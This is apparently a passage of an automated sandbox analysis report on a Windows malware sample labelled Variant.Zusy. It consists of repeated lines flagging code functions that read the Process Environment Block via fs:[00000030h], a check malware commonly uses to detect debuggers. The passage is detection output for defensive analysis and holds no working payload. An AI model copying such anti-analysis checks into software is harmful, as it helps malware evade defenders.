          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB1074 mov eax, dword ptr fs:[00000030h]3_2_00AB1074
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A00050 mov eax, dword ptr fs:[00000030h]3_2_00A00050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A00050 mov eax, dword ptr fs:[00000030h]3_2_00A00050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E519E mov eax, dword ptr fs:[00000030h]3_2_009E519E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E519E mov ecx, dword ptr fs:[00000030h]3_2_009E519E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A161A0 mov eax, dword ptr fs:[00000030h]3_2_00A161A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A161A0 mov eax, dword ptr fs:[00000030h]3_2_00A161A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8190 mov ecx, dword ptr fs:[00000030h]3_2_009E8190
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A651BE mov eax, dword ptr fs:[00000030h]3_2_00A651BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A651BE mov eax, dword ptr fs:[00000030h]3_2_00A651BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A651BE mov eax, dword ptr fs:[00000030h]3_2_00A651BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A651BE mov eax, dword ptr fs:[00000030h]3_2_00A651BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00ABF1B5 mov eax, dword ptr fs:[00000030h]3_2_00ABF1B5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00ABF1B5 mov eax, dword ptr fs:[00000030h]3_2_00ABF1B5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0C182 mov eax, dword ptr fs:[00000030h]3_2_00A0C182
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAA189 mov eax, dword ptr fs:[00000030h]3_2_00AAA189
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAA189 mov ecx, dword ptr fs:[00000030h]3_2_00AAA189
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1A185 mov eax, dword ptr fs:[00000030h]3_2_00A1A185
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A14190 mov eax, dword ptr fs:[00000030h]3_2_00A14190
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F61A7 mov eax, dword ptr fs:[00000030h]3_2_009F61A7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F61A7 mov eax, dword ptr fs:[00000030h]3_2_009F61A7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F61A7 mov eax, dword ptr fs:[00000030h]3_2_009F61A7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F61A7 mov eax, dword ptr fs:[00000030h]3_2_009F61A7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A741E8 mov eax, dword ptr fs:[00000030h]3_2_00A741E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0D1EF mov eax, dword ptr fs:[00000030h]3_2_00A0D1EF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FC1C0 mov eax, dword ptr fs:[00000030h]3_2_009FC1C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov eax, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov eax, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov eax, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov eax, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov eax, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov eax, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov eax, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov ecx, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov ecx, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov eax, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov eax, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov eax, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA31DC mov eax, dword ptr fs:[00000030h]3_2_00AA31DC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E31E0 mov eax, dword ptr fs:[00000030h]3_2_009E31E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EB1E1 mov eax, dword ptr fs:[00000030h]3_2_009EB1E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EB1E1 mov eax, dword ptr fs:[00000030h]3_2_009EB1E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EB1E1 mov eax, dword ptr fs:[00000030h]3_2_009EB1E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A04120 mov eax, dword ptr fs:[00000030h]3_2_00A04120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A04120 mov eax, dword ptr fs:[00000030h]3_2_00A04120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A04120 mov eax, dword ptr fs:[00000030h]3_2_00A04120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A04120 mov eax, dword ptr fs:[00000030h]3_2_00A04120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A04120 mov ecx, dword ptr fs:[00000030h]3_2_00A04120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1513A mov eax, dword ptr fs:[00000030h]3_2_00A1513A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1513A mov eax, dword ptr fs:[00000030h]3_2_00A1513A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9100 mov eax, dword ptr fs:[00000030h]3_2_009E9100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9100 mov eax, dword ptr fs:[00000030h]3_2_009E9100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9100 mov eax, dword ptr fs:[00000030h]3_2_009E9100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F0100 mov eax, dword ptr fs:[00000030h]3_2_009F0100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F0100 mov eax, dword ptr fs:[00000030h]3_2_009F0100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F0100 mov eax, dword ptr fs:[00000030h]3_2_009F0100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E3138 mov ecx, dword ptr fs:[00000030h]3_2_009E3138
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EB171 mov eax, dword ptr fs:[00000030h]3_2_009EB171
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EB171 mov eax, dword ptr fs:[00000030h]3_2_009EB171
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A112BD mov esi, dword ptr fs:[00000030h]3_2_00A112BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A112BD mov eax, dword ptr fs:[00000030h]3_2_00A112BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A112BD mov eax, dword ptr fs:[00000030h]3_2_00A112BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA129A mov eax, dword ptr fs:[00000030h]3_2_00AA129A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1D294 mov eax, dword ptr fs:[00000030h]3_2_00A1D294
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1D294 mov eax, dword ptr fs:[00000030h]3_2_00A1D294
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E52A5 mov eax, dword ptr fs:[00000030h]3_2_009E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E52A5 mov eax, dword ptr fs:[00000030h]3_2_009E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E52A5 mov eax, dword ptr fs:[00000030h]3_2_009E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E52A5 mov eax, dword ptr fs:[00000030h]3_2_009E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E52A5 mov eax, dword ptr fs:[00000030h]3_2_009E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F62A0 mov eax, dword ptr fs:[00000030h]3_2_009F62A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F62A0 mov eax, dword ptr fs:[00000030h]3_2_009F62A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F62A0 mov eax, dword ptr fs:[00000030h]3_2_009F62A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F62A0 mov eax, dword ptr fs:[00000030h]3_2_009F62A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB2E8 mov eax, dword ptr fs:[00000030h]3_2_00AAB2E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB2E8 mov eax, dword ptr fs:[00000030h]3_2_00AAB2E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB2E8 mov eax, dword ptr fs:[00000030h]3_2_00AAB2E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB2E8 mov eax, dword ptr fs:[00000030h]3_2_00AAB2E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E12D4 mov eax, dword ptr fs:[00000030h]3_2_009E12D4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA1229 mov eax, dword ptr fs:[00000030h]3_2_00AA1229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E5210 mov eax, dword ptr fs:[00000030h]3_2_009E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E5210 mov ecx, dword ptr fs:[00000030h]3_2_009E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E5210 mov eax, dword ptr fs:[00000030h]3_2_009E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E5210 mov eax, dword ptr fs:[00000030h]3_2_009E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B236 mov eax, dword ptr fs:[00000030h]3_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B236 mov eax, dword ptr fs:[00000030h]3_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B236 mov eax, dword ptr fs:[00000030h]3_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B236 mov eax, dword ptr fs:[00000030h]3_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B236 mov eax, dword ptr fs:[00000030h]3_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B236 mov eax, dword ptr fs:[00000030h]3_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8239 mov eax, dword ptr fs:[00000030h]3_2_009E8239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8239 mov eax, dword ptr fs:[00000030h]3_2_009E8239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8239 mov eax, dword ptr fs:[00000030h]3_2_009E8239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A9B260 mov eax, dword ptr fs:[00000030h]3_2_00A9B260
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A9B260 mov eax, dword ptr fs:[00000030h]3_2_00A9B260
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A2927A mov eax, dword ptr fs:[00000030h]3_2_00A2927A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9240 mov eax, dword ptr fs:[00000030h]3_2_009E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9240 mov eax, dword ptr fs:[00000030h]3_2_009E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9240 mov eax, dword ptr fs:[00000030h]3_2_009E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9240 mov eax, dword ptr fs:[00000030h]3_2_009E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A74257 mov eax, dword ptr fs:[00000030h]3_2_00A74257
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA138A mov eax, dword ptr fs:[00000030h]3_2_00AA138A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A9D380 mov ecx, dword ptr fs:[00000030h]3_2_00A9D380
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1138B mov eax, dword ptr fs:[00000030h]3_2_00A1138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1138B mov eax, dword ptr fs:[00000030h]3_2_00A1138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1138B mov eax, dword ptr fs:[00000030h]3_2_00A1138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1B390 mov eax, dword ptr fs:[00000030h]3_2_00A1B390
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A12397 mov eax, dword ptr fs:[00000030h]3_2_00A12397
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A103E2 mov eax, dword ptr fs:[00000030h]3_2_00A103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A103E2 mov eax, dword ptr fs:[00000030h]3_2_00A103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A103E2 mov eax, dword ptr fs:[00000030h]3_2_00A103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A103E2 mov eax, dword ptr fs:[00000030h]3_2_00A103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A103E2 mov eax, dword ptr fs:[00000030h]3_2_00A103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A103E2 mov eax, dword ptr fs:[00000030h]3_2_00A103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A923E3 mov ecx, dword ptr fs:[00000030h]3_2_00A923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A923E3 mov ecx, dword ptr fs:[00000030h]3_2_00A923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A923E3 mov eax, dword ptr fs:[00000030h]3_2_00A923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A153C5 mov eax, dword ptr fs:[00000030h]3_2_00A153C5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A653CA mov eax, dword ptr fs:[00000030h]3_2_00A653CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A653CA mov eax, dword ptr fs:[00000030h]3_2_00A653CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA131B mov eax, dword ptr fs:[00000030h]3_2_00AA131B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A76365 mov eax, dword ptr fs:[00000030h]3_2_00A76365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A76365 mov eax, dword ptr fs:[00000030h]3_2_00A76365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A76365 mov eax, dword ptr fs:[00000030h]3_2_00A76365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EF358 mov eax, dword ptr fs:[00000030h]3_2_009EF358
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FF370 mov eax, dword ptr fs:[00000030h]3_2_009FF370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FF370 mov eax, dword ptr fs:[00000030h]3_2_009FF370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FF370 mov eax, dword ptr fs:[00000030h]3_2_009FF370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F849B mov eax, dword ptr fs:[00000030h]3_2_009F849B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E649B mov eax, dword ptr fs:[00000030h]3_2_009E649B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E649B mov eax, dword ptr fs:[00000030h]3_2_009E649B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A734A0 mov eax, dword ptr fs:[00000030h]3_2_00A734A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A734A0 mov eax, dword ptr fs:[00000030h]3_2_00A734A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A734A0 mov eax, dword ptr fs:[00000030h]3_2_00A734A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1D4B0 mov eax, dword ptr fs:[00000030h]3_2_00A1D4B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A764B5 mov eax, dword ptr fs:[00000030h]3_2_00A764B5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A764B5 mov eax, dword ptr fs:[00000030h]3_2_00A764B5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E1480 mov eax, dword ptr fs:[00000030h]3_2_009E1480
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F34B1 mov eax, dword ptr fs:[00000030h]3_2_009F34B1
